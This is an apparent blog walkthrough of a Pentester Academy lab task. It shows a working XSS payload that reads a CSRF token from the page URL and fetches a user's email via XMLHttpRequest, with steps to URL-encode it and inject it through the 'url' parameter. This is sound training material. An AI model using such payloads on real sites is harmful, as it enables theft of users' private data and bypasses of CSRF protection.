Javascript for Pentester Task 16

Hello Internet people, today I am going to post another solution to a task from Javascript for Pentester at Pentester Academy. In this task we learn how to find, use and play with a CSRF token. CSRF tokens are meant to mitigate Cross-Site Request Forgery, but they can also be bypassed if they are not used properly. You can view solutions to the other tasks here.

Task 16: Extracting CSRF Tokens | TASK LINK

The task is to find John's email address using an XSS vulnerability on the page, but a new concept arises here: the use of CSRF tokens. The token value is visible in the URL itself, and we have to use that value to get the email address. This task is also of moderate difficulty; you need to know the XMLHttpRequest method, its syntax and how to use it.
Solution:
The injection point is the same as in the previous task: the url parameter. You can apply a few test injections to verify that. While viewing the page source you will see this comment, probably left by the developer: “ Email can be obtained via a GET request to /lab/webapp/jfp/16/email with params name=john and anything else you might need? 🙂”. If you type the complete URL “http://pentesteracademylab.appspot.com/lab/webapp/jfp/16/email?name=john” into the URL bar, you will not see John's email address, because that request is missing the token.

<script>
  // Read the token from the current page's URL: split on "=" and take the third piece.
  var path = location.href.split("=")[2];
  var req = new XMLHttpRequest();
  req.onreadystatechange = function(){
    // Act only once the response is complete (readyState 4) and the status is 200.
    if (this.status == 200 && this.readyState == 4)
    {
      var data = this.responseText;
      // Write the response body into the page's div with id="result".
      document.getElementById('result').innerHTML = data;
    }
  };
  // Asynchronous GET to the endpoint named in the source comment, with the token appended.
  req.open('GET','http://pentesteracademylab.appspot.com/lab/webapp/jfp/16/email?name=john&csrf_token='+path,true);
  req.send();
</script>

In this code we first have to get the token value. We cannot hard-code it, so we read it from the URL itself: location.href.split("=")[2] splits the URL at every “=” and takes the third piece, which is stored in the variable “path”. After that we create an XMLHttpRequest to the endpoint from the comment, retrieve the response as text and write it into the div with id="result". Copy and URL-encode the code and paste it after the ‘url’ parameter on the same page.
Refer to this post for a quick solution to the Javascript for Pentester tasks. For in-depth video tutorials, please refer to the video solutions on the Pentester Academy website.